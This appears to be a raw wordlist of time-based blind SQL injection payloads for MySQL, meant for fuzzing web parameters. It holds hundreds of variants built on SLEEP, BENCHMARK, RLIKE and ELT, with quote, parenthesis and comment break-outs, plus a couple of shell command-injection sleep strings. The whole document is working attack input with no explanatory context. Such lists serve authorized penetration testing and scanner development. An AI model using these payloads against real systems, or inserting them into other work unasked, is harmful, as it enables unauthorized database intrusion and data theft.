'XOR(SELECT(0)FROM(SELECT(SLEEP(10)'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 5=5)"/
 AND (SELECT 6150 FROM (SELECT(SLEEP(10)))ncsD)
if(1=1,sleep(10),0)/*'XOR(if(1=1,sleep(10),0))OR'"XOR(if(1=1,sleep(10),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(10),0))OR"*/
SLEEP(10)/*' or SLEEP(10) or '" or SLEEP(10) or "*/
%2c(select%5*%5from%5(select(sleep(10)))a)
(select(0)from(select(sleep(10)))v)
(SELECT SLEEP(10))
'%2b(select*from%2fselect(sleep(10))a)%2b'
(select*from%2fselect(sleep(10))a)
1'%2b(select*from%2fselect(sleep(10))a)%2b'
,(select*from(select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(10))A))
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)--
'+(select*from%2fselect(sleep(10))a)+'
(select(0)from(select(sleep(10)))v)%2f'+(select(0)from(select(sleep(10)))v)+'"
(select(0)from(select(sleep(10)))v)%2f*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*%2f
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/
',''),/*test*/%26%26%09sLeEp(10)%09--+
1 and sleep 10--
1 and sleep 10
1 and sleep(10)--
1 and sleep(10)
' and sleep 10--
' and sleep 10
' and sleep 10 and '1'='1
' and sleep(10) and '1'='1
' and sleep(10)--
' and sleep(10)
' AnD SLEEP(10) ANd '1
and sleep 10--
and sleep 10
and sleep(10)--
and sleep(10)
and SELECT SLEEP(10); #
AnD SLEEP(10)
AnD SLEEP(10)--
AnD SLEEP(10)#
' AND SLEEP(10)#
" AND SLEEP(10)#
') AND SLEEP(10)#
OR BLIND:
or sleep 10--
or sleep 10
or sleep(10)--
or sleep(10)
or SELECT SLEEP(10); #
or SLEEP(10)
or SLEEP(10)#
or SLEEP(10)--
or SLEEP(10)="
or SLEEP(10)='
' OR SLEEP(10)#
" OR SLEEP(10)#
') OR SLEEP(10)#
')) or sleep(10)='
" or sleep(10)#
1) or sleep(10)#
)) or sleep(10)='
1)) or sleep(10)#
or sleep(10)#
%20'sleep%20100'
%20$(sleep%20100)
")) or sleep(10)="
or sleep(10)='
") or sleep(10)="
) or sleep(10)='
1 or sleep(10)#
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(10)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
RLIKE SLEEP(10)--
' RLIKE SLEEP(10)--
' RLIKE SLEEP(10)-- 1337
" RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10) AND ('1337'='1337
')) RLIKE SLEEP(10) AND (('1337'='1337
'))) RLIKE SLEEP(10) AND ((('1337'='1337
) RLIKE SLEEP(10)-- 1337
) RLIKE SLEEP(10) AND (1337=1337
)) RLIKE SLEEP(10) AND ((1337=1337
))) RLIKE SLEEP(10) AND (((1337=1337
1 RLIKE SLEEP(10)
1 RLIKE SLEEP(10)-- 1337
1 RLIKE SLEEP(10)# 1337"
) WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(10))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' RLIKE SLEEP(10) AND '1337'='1337
') RLIKE SLEEP(10) AND ('1337' LIKE '1337
')) RLIKE SLEEP(10) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(10) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(10) AND '1337%'='1337
' RLIKE SLEEP(10) AND '1337' LIKE '1337
") RLIKE SLEEP(10) AND ("1337"="1337
")) RLIKE SLEEP(10) AND (("1337"="1337
"))) RLIKE SLEEP(10) AND ((("1337"="1337
" RLIKE SLEEP(10) AND "1337"="1337
") RLIKE SLEEP(10) AND ("1337" LIKE "1337
")) RLIKE SLEEP(10) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(10) AND ((("1337" LIKE "1337
" RLIKE SLEEP(10) AND "1337" LIKE "1337
' RLIKE SLEEP(10) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(10)-- 1337
' AND ELT(1337=1337,SLEEP(10))--
' AND ELT(1337=1337,SLEEP(10))-- 1337
" AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(10)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(10)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(10))-- 1337
) AND ELT(1337=1337,SLEEP(10)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(10)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(10)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(10))
1 AND ELT(1337=1337,SLEEP(10))-- 1337
1 AND ELT(1337=1337,SLEEP(10))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(10)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))|[1
%' AND ELT(1337=1337,SLEEP(10)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(10)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(10)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(10)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(10)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(10)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(10)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(10))-- 1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
